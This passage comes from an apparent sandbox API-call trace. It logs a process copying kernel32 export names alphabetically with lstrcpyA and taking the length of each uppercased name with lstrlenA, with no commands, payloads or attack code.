lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.656] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.656] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.657] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.657] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.657] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.657] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.657] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.657] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.657] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.657] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.657] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.657] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.657] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.657] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.657] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.657] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.657] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.657] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.657] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.657] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.657] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.658] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.658] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.658] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.658] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.658] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.658] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.658] lstrlenA (lpString="BEEP") returned 4 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.658] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.658] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.658] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.658] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.658] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.658] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0076.658] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0076.658] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0076.658] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0076.658] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0076.658] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0076.659] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0076.659] lstrlenA (lpString="CANCELIO") returned 8 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0076.659] lstrlenA (lpString="CANCELIOEX") returned 10 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0076.659] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0076.659] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0076.659] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0076.659] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0076.659] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0076.659] lstrlenA (lpString="CHECKELEVATION") returned 14 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0076.659] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0076.659] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0076.659] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0076.659] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0076.659] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0076.659] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0076.659] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0076.659] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0076.659] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0076.660] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0076.660] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0076.660] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0076.660] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0076.660] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0076.660] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0076.660] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0076.660] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0076.660] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0076.660] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0076.660] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0076.660] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0076.660] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0076.660] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0076.660] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0076.660] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0076.660] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0076.660] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0076.660] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0076.661] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0076.661] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0076.661] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0076.661] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0076.661] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0076.661] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0076.661] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0076.661] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0076.661] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0076.661] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0076.661] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0076.661] lstrlenA (lpString="COPYCONTEXT") returned 11 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0076.661] lstrlenA (lpString="COPYFILEA") returned 9 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0076.661] lstrlenA (lpString="COPYFILEEXA") returned 11 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0076.661] lstrlenA (lpString="COPYFILEEXW") returned 11 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0076.661] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0076.661] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0076.661] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0076.662] lstrlenA (lpString="COPYFILEW") returned 9 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0076.662] lstrlenA (lpString="COPYLZFILE") returned 10 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0076.662] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0076.662] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0076.662] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0076.662] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0076.662] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0076.662] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0076.662] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0076.662] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0076.662] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0076.662] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0076.662] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0076.662] lstrlenA (lpString="CREATEEVENTA") returned 12 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0076.662] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0076.662] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0076.662] lstrlenA (lpString="CREATEEVENTW") returned 12 [0076.662] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0076.663] lstrlenA (lpString="CREATEFIBER") returned 11 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0076.663] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0076.663] lstrlenA (lpString="CREATEFILEA") returned 11 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0076.663] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0076.663] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0076.663] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0076.663] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0076.663] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0076.663] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0076.663] lstrlenA (lpString="CREATEFILEW") returned 11 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0076.663] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0076.663] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0076.663] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0076.663] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0076.663] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0076.663] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0076.663] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0076.663] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0076.663] lstrlenA (lpString="CREATEJOBSET") returned 12 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0076.664] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0076.664] lstrcpyA (in: lpString1=0x3f2d1ec, 